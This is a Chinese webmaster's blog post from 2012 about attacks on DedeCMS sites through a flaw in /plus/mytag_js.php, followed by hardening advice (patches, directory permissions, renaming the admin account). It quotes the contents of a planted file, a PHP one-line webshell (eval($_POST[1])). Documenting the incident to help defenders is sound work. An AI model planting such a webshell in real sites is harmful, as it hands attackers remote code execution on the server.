谈Dedecms近期的一些隐患及如何预防风险
发布时间:2012-02-04 09:27:06
Dedecms一直是很火的建站cms,主要得益于两大站长网的鼎力支持;不过,人火是非多,cms太火了同样会被别有用心的人盯上。我的网站一直在使用dedecms,前段时间又一次受到攻击,攻击的目的很简单,那么便是黑链,知道后稍微修改下代码就恢复了,不是很严重;这段时间网站又被莫名上传文件,类似前一次,虽然对方还没来得及修改网站模板,不过这说明网站安全防患还未到位,对方任何时候都可能再次取得管理员权限,所以要特别注意网站的安全防患措施。
因为我比较喜欢寻根究底,所以就去网上找了一下相关的资料,发现这确实是dedecms的漏洞,黑客可以利用多维的变量绕过正则检测,漏洞主要发生在/plus/mytag_js.php中,原理便是准备一个MySQL数据库来攻击已知网站的数据库,通过向数据库中写入一句话的代码,只要成功写入,那么以后便可以利用这些代码来获得后台管理员权限。
结合我的网站被攻击已经别人类似的经历来看,黑客写入的文件主要存在于/plus/文件夹下,目前已知的几个文件包括ga.php、log.php、b.php、b1.php等,文件的特征便是短小,内容很少,可能写入的时候不是很方便,不过这些代码的作用确实不小的。
下面这是ga.php文件中的部分代码:
<title>login</title>no<?php
eval($_POST[1])
?>
<title>login</title>no<?php
eval($_POST[1])
?>
<title>login</title>no<?php
eval($_POST[1])
?>
实际的代码比上面截取的要长,不过都是这段代码的重复,至于log.php的代码,同这个类似,只有一句话,简单明了,如果你对网络安全稍有了解,那么会知道<?php eval($_POST[1]);?>是php一句话木马,使用部分指定的工具可以执行这段代码,预计是破解密码的功能。
既然已经知道对方是利用什么样的漏洞,同时知道对方利用什么样的原理来利用漏洞,那么要怎么预防这些危险的事发生呢?经过查询大量的资料,我初步整理出下面这些预防漏洞被利用的步骤,希望对同样适用dedecms的站长朋友们有所帮助。
一、升级版本打好补丁设置目录权限
这是官方对此的解决办法,不管你使用的是什么版本的dedecms,都要及时在后台升级版本自动更新补丁,这是避免漏洞被利用的最重要的一步;同时官方还提供设置目录的方法,主要是设置data、templets、uploads、a为可读写不可执行权限;include、member、plus、后台管理目录等设置为可执行可读不可写入权限;删除install及special目录,具体如何设置见官方说明。
二、修改admin账号及密码
黑客可能是利用默认admin账号,随后推测密码来破解的,所以修改默认的admin账号非常重要,至于如何修改,方法很多,比较有效的是用phpadmin登陆网站数据库,找到dede_admin数据库表(dede是数据库表前缀),修改其中userid及pwd两项,其中密码一定要修改成f297a57a5a743894a0e4,这是默认的密码admin;修改后去后台登陆,登陆dede后台后修改密码。
三、别的值得注意的地方
至于更多的细节,同样要注意,尽量别选择太廉价的空间,太廉价的空间很容易出现服务器本身的安全问题,只要服务器出现问题,整个服务器下面的网站都没救了。还有便是,如果没必要,尽量别开通会员注册什么的,使用起来很麻烦;至于网站后台目录,不要写到robots.txt里面,同时每个月至少换一次,管理员密码什么的同样要更换,避免和别的账号密码相同被推测出来。
经过这几次网站被攻击的实例,不得不说,互联网不是一个可以安心睡大觉的网,作为站长,算是织网的人,更应该注重网络安全;只要按照要求去做到了这些防范措施,不说100%,至少95%的可能不会被顺利取得后台权限。本文由爱不网(http://www.aibue.com)原创,转载合作请注明!
猜你喜欢
- 这几天有点忙,一直抽不出时间写这篇日记。最近很多站长一直催我把中篇写出来,所以我决定今天放下手中的工作,把中篇写完。自上次写了网站运营日记(
- Windows2000系统提供了FTP服务功能,由于简单易用,与Windows系统本身结合紧密,深受广大用户的喜爱。但使用IIS5.0 架设
- “企业的成功在于其创造力、想象力、大胆的尝试及富于幻想的激情”,这是吉姆·柯林
- Easy CGI在1998年成立于美国纽约,专业提供Windows平台的虚拟主机,与Microsoft有良好的合作关系,算是Windows主
- 很久没写文章了,前段时间GG帐户又被封了,损失了几千刀.稍微休息了下,08年想做个英文站玩一下.2月16那天ARY来我家拜年,聊了一些关于英
- 对邮件服务器的攻击形式多种多样:有利用缓冲区溢出漏洞进行的攻击,还有拒绝服务攻击和目录收集攻击等等。加固邮件服务器、使用邮件过滤工具、采用被
- DEDE图片横向滚动代码<DIV id=brand align="center"> &l
- 虚拟服务器:对外它是单一的入口,对内有很多台计算机为它服务.对使用它的人来说,它是一台机器,有单一的入口点.具体的实现技术包括两种: 应用层
- 据国外媒体报道,上周在北京举行的国际万维网大会上,两位Google的工程师展示了下一代的图片搜索。值得注意的是,新的图片搜索不再只是由图片相
- 其实这个问题只要将请求网页HTTP内容明白就好解决.请求HTTP头内容如下:GET 你的网址 HTTP/1.1Accept: image/g
- 记者 刘扬盛大网络、百度、金山软件、新浪等网络大腕纷纷宣布进军网页游戏,更有业内人士表示2008年网页游戏的用户规模将同比增长400%,一场
- 当安全等级为user时,这时我们在本机建立的用户必须加入到SMB服务器中,命令为 smbpasswd -a 用户 添加LINUX用户到SMB
- 在WIN下安装APACHE配置虚拟目录和UNIN下基本是一样的就是修改httpd.conf1:单个IP对应单个玉米例如:www.phpuni
- PHPWind v7.3.2收藏夹分页链接错误问题解决方法:打开mode/o/m_article.php查找:$pages =&n
- 百度贴吧里至今还能搜出不少对曾先生的诽谤帖。本报记者陈伟斌摄昨日,记者接到惠东一位曾先生的求助电话,他说一个月前,百度贴吧里出现了几个透露了
- 一、 基本网页的SEO手段网页是一个网站构成的基本元素,因此,对于网页本身的优化在整个SEO优化过程中有举足轻重的作用。下面分为两个部分来讨
- 越来越多的网站和博客开始投放Google AdSense广告,随之而来的是每个发布者的喜悦和烦恼。“今天的广告费又多了”,“单价竟然上涨了0
- 概要当用户试图通过 HTTP 或文件传输协议 (FTP) 访问一台正在运行 Internet 信息服务 (IIS) 的服务器上的内容时,II
- 我的网站首页被收录了,但CMS搜索网站名称却排不到第一个,怎么办?答:排序算法非常复杂。我们的目标,即在于通过算法改进,让用户以最小的成本,
- 不太懂的SEO新手,往往看见用群发就怀疑,认为是作弊?是黑猫?会被K?会被惩罚?会被降权?会被删除站?其实新手也很可怜,他们连被K具体是什么